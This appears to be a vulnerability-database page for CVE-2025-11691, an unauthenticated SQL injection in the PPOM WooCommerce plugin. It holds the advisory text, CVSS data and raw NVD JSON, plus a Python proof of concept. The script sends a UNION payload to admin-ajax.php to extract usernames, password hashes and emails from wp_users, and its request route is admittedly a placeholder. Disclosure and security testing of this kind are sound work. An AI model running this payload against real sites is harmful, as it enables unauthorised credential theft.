Security Vulnerability Report
CVE-2025-11691 CVSS 7.5 HIGH

CVE-2025-11691

Published: 2025-10-18 07:15:36
Last Modified: 2026-04-15 00:35:42

Description

The PPOM – Product Addons & Custom Fields for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the PPOM_Meta::get_fields_by_id() function in all versions up to, and including, 33.0.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This is only exploitable when the Enable Legacy Price Calculations setting is enabled.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No CPE configuration data available (NVD record status: Deferred).

PPOM – Product Addons & Custom Fields for WooCommerce <= 33.0.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11691 - PPOM WooCommerce SQL Injection PoC
# Vulnerability: Unauthenticated SQL Injection via PPOM_Meta::get_fields_by_id()
# Affected: PPOM Plugin <= 33.0.15 (only when "Enable Legacy Price Calculations" is enabled)
#
# NOTE: the admin-ajax action name and parameter name used below ("ppom_get_fields",
# "ppom_id") are placeholders; the advisory does not name the request route that
# reaches get_fields_by_id(). Confirm the real entry point against the plugin
# source (classes/ppom.class.php) before relying on this script.
import requests
import sys

TARGET_URL = "http://target-wordpress-site.com"
# Placeholder request parameters; adjust to the actual route and parameter name.
AJAX_ACTION = "ppom_get_fields"
ID_PARAM = "ppom_id"


def exploit_sqli(target_url):
    """
    Exploit SQL Injection in PPOM plugin's get_fields_by_id() function.

    The vulnerable parameter is concatenated directly into the SQL query
    without escaping or prepared statements.
    """
    # UNION-based payload; the column count (16 here) must match the original
    # SELECT, so it will usually need adjusting per plugin version.
    injection_payload = (
        "1 UNION SELECT user_login,user_pass,user_email,1,1,1,1,1,1,1,1,1,1,1,1,1 "
        "FROM wp_users WHERE ID=1-- -"
    )
    exploit_url = f"{target_url}/wp-admin/admin-ajax.php"
    data = {"action": AJAX_ACTION, ID_PARAM: injection_payload}

    try:
        response = requests.post(exploit_url, data=data, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

    if response.status_code != 200:
        print(f"[-] Request failed with status: {response.status_code}")
        return None

    print(f"[+] Response received ({len(response.text)} bytes)")
    # Crude heuristic: a leaked wp_users row carries a login and a "$P$"-style hash.
    if "admin" in response.text or "$" in response.text:
        print("[+] Potential sensitive data found in response")
        print(response.text[:500])
    return response.text


def check_vulnerability(target_url):
    """
    Heuristic check: compare a plain id with one carrying a quoted condition.

    A 200 for the plain id and a 500 for the tampered one suggests the value
    reaches the query unescaped. This is indicative only: the plugin may
    swallow SQL errors and answer 200 either way, so a negative result does
    not prove the target is patched.
    """
    test_payload = "1' AND '1'='1"
    normal_payload = "1"
    exploit_url = f"{target_url}/wp-admin/admin-ajax.php"

    try:
        r1 = requests.post(exploit_url, data={"action": AJAX_ACTION, ID_PARAM: normal_payload}, timeout=10)
        r2 = requests.post(exploit_url, data={"action": AJAX_ACTION, ID_PARAM: test_payload}, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

    if r1.status_code == 200 and r2.status_code == 500:
        print("[+] Target appears to be VULNERABLE to SQL Injection")
        return True
    print("[-] Target does not appear to be vulnerable")
    return False


if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    print(f"[*] Testing target: {TARGET_URL}")
    if check_vulnerability(TARGET_URL):
        print("[*] Attempting exploitation...")
        exploit_sqli(TARGET_URL)

References

https://plugins.trac.wordpress.org/browser/woocommerce-product-addon/trunk/classes/ppom.class.php#L337 (vulnerable code location)
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3379431%40woocommerce-product-addon&new=3379431%40woocommerce-product-addon&sfp_email=&sfph_mail= (fixing changeset)
https://www.wordfence.com/threat-intel/vulnerabilities/id/eefcc290-b7f7-4cf0-9ccc-db4c883d6426?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11691", "sourceIdentifier": "[email protected]", "published": "2025-10-18T07:15:35.707", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The PPOM – Product Addons & Custom Fields for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the PPOM_Meta::get_fields_by_id() function in all versions up to, and including, 33.0.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This is only exploitable when the Enable Legacy Price Calculations setting is enabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/woocommerce-product-addon/trunk/classes/ppom.class.php#L337", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3379431%40woocommerce-product-addon&new=3379431%40woocommerce-product-addon&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/eefcc290-b7f7-4cf0-9ccc-db4c883d6426?source=cve", "source": "[email protected]"}]}}